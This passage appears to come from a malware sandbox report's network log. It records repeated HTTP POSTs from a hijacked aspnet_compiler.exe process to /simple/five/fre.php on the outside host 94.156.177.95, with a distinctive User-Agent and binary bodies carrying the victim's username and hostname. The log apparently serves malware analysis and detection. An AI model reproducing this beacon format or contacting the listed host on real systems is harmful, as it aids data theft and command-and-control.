                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    65192.168.2.55004194.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:45.640340090 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:45.645313025 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:46.620285034 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:46 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    66192.168.2.55004294.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:46.933274984 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:46.938497066 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:47.899243116 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:47 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    67192.168.2.55004394.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:48.048041105 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:48.052999973 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:49.008040905 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:48 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    68192.168.2.55004494.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:49.193806887 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:49.198771954 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:50.169981003 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:50 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    69192.168.2.55004594.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:51.309339046 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:51.314217091 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:52.304002047 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:52 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    70192.168.2.55004694.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:52.467847109 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:52.472929001 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:53.784013033 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:53 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    71192.168.2.55004794.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:53.946496010 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:53.951385975 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:54.916069031 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:54 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    72192.168.2.55004894.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:55.073044062 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:55.077914000 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:56.055499077 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:55 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    73192.168.2.55004994.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:56.201775074 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:56.206763029 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:57.189745903 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:57 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    74192.168.2.55005094.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:57.347786903 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:57.353616953 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:58.301390886 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:58 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    75192.168.2.55005194.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:58.465945005 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:58.470890999 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:15:59.439821959 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:15:59 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    76192.168.2.55005294.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:15:59.596467018 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:15:59.601398945 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:16:00.576663971 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:16:00 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    77192.168.2.55005394.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:16:00.723691940 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:16:00.728619099 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:16:01.676630020 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:16:01 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    78192.168.2.55005494.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:16:01.829083920 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:16:01.834857941 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:16:02.802675962 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:16:02 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    79192.168.2.55005594.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:16:03.160758018 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:16:03.165663004 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:16:04.169306993 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:16:04 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    80192.168.2.55005694.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:16:04.332446098 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
                                                                                                                    Nov 15, 2024 18:16:04.337363958 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                                                                                    Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                                                                                    Nov 15, 2024 18:16:05.363466024 CET236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx/1.26.1
                                                                                                                    Date: Fri, 15 Nov 2024 17:16:05 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Length: 23
                                                                                                                    Connection: close
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Status: 404 Not Found
                                                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                    Data Ascii: File not found.


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    81192.168.2.55005794.156.177.95803092C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 15, 2024 18:16:05.830832958 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                    Host: 94.156.177.95
                                                                                                                    Accept: */*
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    Content-Encoding: binary
                                                                                                                    Content-Key: B29C1220
                                                                                                                    Content-Length: 153
                                                                                                                    Connection: close
